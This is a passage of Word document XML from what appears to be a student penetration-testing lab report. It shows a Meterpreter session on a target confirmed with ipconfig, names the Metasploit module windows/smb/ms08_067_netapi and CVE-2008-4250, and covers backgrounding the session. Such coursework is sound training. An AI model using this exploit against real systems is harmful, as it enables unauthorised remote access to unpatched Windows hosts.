        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C622EA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Attempting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to trigger the vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA402D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580D29CC"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1041</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09</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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>48</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0700</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C096C7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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60923C7C"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0FEA98CB" w14:textId="6527508A"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0FF7E39D" w14:textId="2FF833B8" w:rsidR="00E00993" w:rsidRDefault="00E00993" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Now that we have remote access, we can verify that we are in the target system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE4F807" w14:textId="6E0C0ABE" w:rsidR="00E00993" w:rsidRDefault="00E00993" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0697D16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ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A066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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E4AC6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gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1AB5F4F5"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>============</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51832E4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MS TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Loopback</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30921F8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Hardware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MAC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p>
    <w:p w14:paraId="70D01C1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xml:space="preserve">MTU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1520</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD271F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Address</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127.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B52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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B814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gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01AB83B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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>============</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE803A8"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Intel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PRO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> T </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Adapter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Packet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Scheduler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Miniport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0FC27"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Hardware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MAC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13</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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183656E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xml:space="preserve">MTU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1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AFF989" w14:textId="353C41F1"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Address</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sidR="00941781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00941781" w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r w:rsidR="00941781" w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP address of target</w:t>
      </w:r>
      <w:r w:rsidR="00941781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Verifies we are in target system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3504EA0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Netmask</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255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D4A592" w14:textId="18926F00"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F0511EF" w14:textId="281E463A" w:rsidR="00E00993" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc20508501"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 3:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2C78F889" w14:textId="61E590B9" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Do research and find about what vulnerability does the exploit get advantage of?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEDFDB9" w14:textId="64312366" w:rsidR="00941781" w:rsidRPr="00834D24" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A145BF" w14:textId="6068F620" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00334CCC">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>This module exploits a parsing flaw in the path canonicalization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>code of NetAPI32.dll through the Server Service. This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>module is capable of bypassing NX on some operating systems and service packs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The correct target must be used to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>prevent the Server Service (along</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>with a dozen others in the same process) from crashing. Windows XP targets seem to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>handle multiple successful exploitation events, but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>on 2003, along with other platforms, is still in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>development.</w:t>
      </w:r>
      <w:r w:rsidR="00665469">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Taken from the show info command while the exploit was loaded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18858958" w14:textId="55F2A4EC" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58ADD52A" w14:textId="2A56ED32" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc20508502"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 4:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="63D672F3" w14:textId="03BE2FB2" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t> of the exploit you used?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323878D6" w14:textId="3B8073EC" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A64BC8" w14:textId="609C08E0" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/ms08_067_netapi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> has is CVE-2008-4250. For more information see the following </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">link: </w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00941781">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://cvedetails.com/cve/CVE-2008-4250/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D0D6E56" w14:textId="674EC7D6" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54553A7A" w14:textId="7AF455EA" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc20508503"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part 3: Meterpreter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="0A90F489" w14:textId="7601EF6D" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00941781"/>
    <w:p w14:paraId="438F6776" w14:textId="40ECDA1B" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc20508504"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 5:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="3F0B4DE5" w14:textId="44DE1687" w:rsidR="00941781" w:rsidRDefault="00941781" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the Meterpreter </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> you created</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00941781">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> report how would you suppress the current Meterpreter session in the background and how you would navigate back to the current session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17131A4D" w14:textId="52E4CCF8" w:rsidR="00E56474" w:rsidRDefault="00E56474" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E982D7F" w14:textId="43863C13" w:rsidR="00E56474" w:rsidRDefault="00E56474" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Command to suppress current Meterpreter session in the background:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBB771A" w14:textId="25D4DDE3" w:rsidR="00E56474" w:rsidRDefault="00E56474" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E1BD3C"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background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F257326"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Backgrounding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABF562B"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72512534" w14:textId="39596F89" w:rsidR="00E56474" w:rsidRPr="00E56474" w:rsidRDefault="00E56474" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
